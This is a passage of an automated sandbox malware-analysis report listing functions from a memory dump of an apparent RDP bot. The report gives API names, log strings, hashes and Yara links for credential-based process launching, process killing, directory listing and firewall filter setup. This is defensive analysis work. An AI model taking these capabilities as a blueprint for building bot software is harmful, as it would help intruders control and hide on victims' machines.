                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction ID: 1530a1fb54a4a4607d96658e83b298e5d89d7ec585c19e5fa60623e2f43929cf
                                                                                                                                                  • Opcode Fuzzy Hash: b0090d0964483dbd382502a5d46bbb8b92a76af7e006c7d57f6bc1aefe64a94b
                                                                                                                                                  • Instruction Fuzzy Hash: D0F05423F3824741F962BB0578427B991526F89B75F8945358D5C4B6C1DD3E598382A0
                                                                                                                                                  Function 00007FF77572477B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction ID: ec2d63413657b2fa603b4fa87cb7647dab3b29bbcfd721279e475faa39bbbfc2
                                                                                                                                                  • Opcode Fuzzy Hash: feb957511d62b8eaeb474345d65e8f4908472f50acb32604004acfb176bd1b87
                                                                                                                                                  • Instruction Fuzzy Hash: DDF05423F3824741F962BB05B8417B991526F89B75F8945358D5C4A6C1DE3E698382A0
                                                                                                                                                  Function 00007FF775724785 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction ID: 67d1be7399e677caee23625330b4174cea5461be801341f27f55d0cf337e1f42
                                                                                                                                                  • Opcode Fuzzy Hash: e6e6db5c1704923bc2628227bb79bfbea2e4cce4d4de5763f44ce758e01c5958
                                                                                                                                                  • Instruction Fuzzy Hash: D6F05423F3824741F962BB0578417B991526F89B75F8945358D5C4A6C1DD3E598382A0
                                                                                                                                                  Function 00007FF775724B8B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fclose
                                                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                                                  • Opcode ID: 3ba9c2e744b8d56c74d6440f5eab32ea91c9b9d896e5e1b05deaa0f4babd28c9
                                                                                                                                                  • Instruction ID: d15c27506f2695fd188d27071ebc134b31a65b453f173519584e69814a6938c9
                                                                                                                                                  • Opcode Fuzzy Hash: 3ba9c2e744b8d56c74d6440f5eab32ea91c9b9d896e5e1b05deaa0f4babd28c9
                                                                                                                                                  • Instruction Fuzzy Hash: E5F05423F3814741F963BB0578417B991526F89B75F8945318D5C4B7C1DD3E598282A0

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 00007FF77572292E Relevance: 56.4, APIs: 17, Strings: 15, Instructions: 435stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcat$CloseErrorHandleLastLogonUser
                                                                                                                                                  • String ID: (app != NULL)$(pi != NULL)$(usr == NULL) || (pwd != NULL)$C:/Projects/rdp/bot/codebase/process.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateProcessA failed(cmd=%s,gle=%lu)$[E] (%s) -> CreateProcessAsUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[E] (%s) -> Failed(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,err=%08x)$[E] (%s) -> LogonUserA failed(usr=%s,pwd=%s,cmd=%s,gle=%lu)$[I] (%s) -> CreateProcessA done(cmd=%s,pid=%lu)$[I] (%s) -> CreateProcessAsUserA done(usr=%s,pwd=%s,cmd=%s,pid=%lu)$[I] (%s) -> Done(usr=%s,pwd=%s,dir=%s,app=%s,arg=%s,pid=%lu)$h$process_create
                                                                                                                                                  • API String ID: 1842180197-3127737957
                                                                                                                                                  • Opcode ID: 69efc9e83c26ff4603d59e723456b3d08b6c98621c4a7dcc95d79ccfcfd90162
                                                                                                                                                  • Instruction ID: b256e109f77a2cdd57607e2f274e53853378b689c9efc959db7635ae9d28f6f9
                                                                                                                                                  • Opcode Fuzzy Hash: 69efc9e83c26ff4603d59e723456b3d08b6c98621c4a7dcc95d79ccfcfd90162
                                                                                                                                                  • Instruction Fuzzy Hash: 631252A3A3C68781F670AB02E4443B9E2A0FB4CF94FD40132D94E47694DF7EE64597A1
                                                                                                                                                  Function 00007FF775723DB3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                                                  • API String ID: 4253334766-1535167640
                                                                                                                                                  • Opcode ID: 3e0de6a5383142c50d747d7485a6cd18731dd1ecefb5aa01e6ee8d7c57e073cb
                                                                                                                                                  • Instruction ID: ba51e05ceefb5d9717dede4ade3ecb959940050852d8235590eb657d9381986e
                                                                                                                                                  • Opcode Fuzzy Hash: 3e0de6a5383142c50d747d7485a6cd18731dd1ecefb5aa01e6ee8d7c57e073cb
                                                                                                                                                  • Instruction Fuzzy Hash: D761F963E3C59B85FB707719A4013B8E271EB08B64FD44132E85E4B2D0DE6CA98483E1
                                                                                                                                                  Function 00007FF77572FF1F Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 24libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                                                                                                  • API String ID: 384173800-4041758303
                                                                                                                                                  • Opcode ID: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                                                                                                                  • Instruction ID: e04f1441bad833749ec5a71c3ad15a1a2ea5c16a6f6e0e9c0c1b77bcfbd26d08
                                                                                                                                                  • Opcode Fuzzy Hash: 85c771fb55e45746b373319f0909d9bbab80cd8ba9edf7ac40692cd287980bbc
                                                                                                                                                  • Instruction Fuzzy Hash: 4FF0D023E3AA9790EE05FB51FC450B4A364BF1CF60FC55136C80D06324EE2CA55A83A0
                                                                                                                                                  Function 00007FF77572929A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 118COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: fflushfwriteinet_addrntohl
                                                                                                                                                  • String ID: 3L$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(filt_idx=%d,res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$setup_ip4_filt
                                                                                                                                                  • API String ID: 3255839625-58178811
                                                                                                                                                  • Opcode ID: 2bcffa2f7a86a1410d73aaa581713aacfe8712eef18de35f9b5a001454aced48
                                                                                                                                                  • Instruction ID: b582746ffaf5ea7a94d36a1849a058f9b58afc8a40464c9c3ed88e5dadcef982
                                                                                                                                                  • Opcode Fuzzy Hash: 2bcffa2f7a86a1410d73aaa581713aacfe8712eef18de35f9b5a001454aced48
                                                                                                                                                  • Instruction Fuzzy Hash: C7517E3262CBC585E7319B25B4403DAB7B5EB99B90F844128D6CC4BB99EF3DC185CB90
                                                                                                                                                  Function 00007FF775726FD5 Relevance: 1.5, APIs: 1, Instructions: 25timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2086374402-0
                                                                                                                                                  • Opcode ID: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                                                                                                                  • Instruction ID: 5f3f804d00dd5056de27b37d6737e9163232c96f178efaf8b21228e7dcb82ffe
                                                                                                                                                  • Opcode Fuzzy Hash: eaf35cacb86d4e2f88e6fced642b51b1d7c27793e30891e7df17b252400794d8
                                                                                                                                                  • Instruction Fuzzy Hash: DDE09BB673898583EF20D719D0407B7A751D79C794F945034E95DC3754DA2CD9518780
                                                                                                                                                  Function 00007FF77573B668 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                                                                                                                                                  • Instruction ID: b0de80746a9877c3cab176b8efb338e9b9ba18a75b96e2cde6e846af0a565d75
                                                                                                                                                  • Opcode Fuzzy Hash: 43cdbd8a1772982e1159f987e7582aee2234c2e3b90ba2fecf474b6389da8852
                                                                                                                                                  • Instruction Fuzzy Hash: AE118287D3DAD3C5F5561A6809693756B805F57FB4F880279CDBC462D39E1E2C038261
                                                                                                                                                  Function 00007FF77573B6B8 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                                                                                                                                                  • Instruction ID: d633f3be278e2ec13b464f4739679b076a48927399d9a58b41fe4282d5105b26
                                                                                                                                                  • Opcode Fuzzy Hash: 00f425755523f90e08f9e80f8d6c7666d97432842fe783b546abaece473fadd6
                                                                                                                                                  • Instruction Fuzzy Hash: DEF03CC7D3CAC385F5561A680C6A3616B815F56AB4F89433A8EBC462D35E1E2C024265
                                                                                                                                                  Function 00007FF77573B558 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
                                                                                                                                                  • Instruction ID: c28ba8b7bf1d8ec99d644185bf82082ba393fbdf60a2211f2dab5df2041222b4
                                                                                                                                                  • Opcode Fuzzy Hash: 04e2900766d9d14cb05d71eedaab4efe8780466c1436e7a6fc7beb0f48e5108a
                                                                                                                                                  • Instruction Fuzzy Hash: 84E0ED83E2EBD341F313973848243286E901B6AF70FC842BACAAC0A2D3CD0C2D01C261
                                                                                                                                                  Function 00007FF7757305D9 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                                                                                                                                  • Instruction ID: a924fe717f4fe08531ea43ca45c9e1867682fce48bba1d66fc1b87c1468aebc7
                                                                                                                                                  • Opcode Fuzzy Hash: ad621d27ed11d527f0a4eb9abd0c574f9942df0d3b361b300398ff936c25c339
                                                                                                                                                  • Instruction Fuzzy Hash: 1AA0025396DC49C4E6401F00E801171B628EB0AA10FC42130C06C520568B2C94008154
                                                                                                                                                  Function 00007FF77572212F Relevance: 66.9, APIs: 13, Strings: 25, Instructions: 417processstringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32strcmp
                                                                                                                                                  • String ID: $ $ $ $(name != NULL) || (pid != 0)$C:/Projects/rdp/bot/codebase/process.c$NULL$P$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> Failed(name=%s,pid=%lu,err=%08x)$[E] (%s) -> OpenProcess failed(gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> TerminateProcess failed(gle=%lu)$[I] (%s) -> Done(name=%s,pid=%lu)$process_kill$|$~$~$~$~
                                                                                                                                                  • API String ID: 3326156344-4160762685
                                                                                                                                                  • Opcode ID: 111a0d222265b0e9b651161f67789db15db04ee1d6344d95adf1997ddbc43c14
                                                                                                                                                  • Instruction ID: 616fa58f6005be34d536f057dd2b074f44d61c2cf1209604574e43c4a00fd3f3
                                                                                                                                                  • Opcode Fuzzy Hash: 111a0d222265b0e9b651161f67789db15db04ee1d6344d95adf1997ddbc43c14
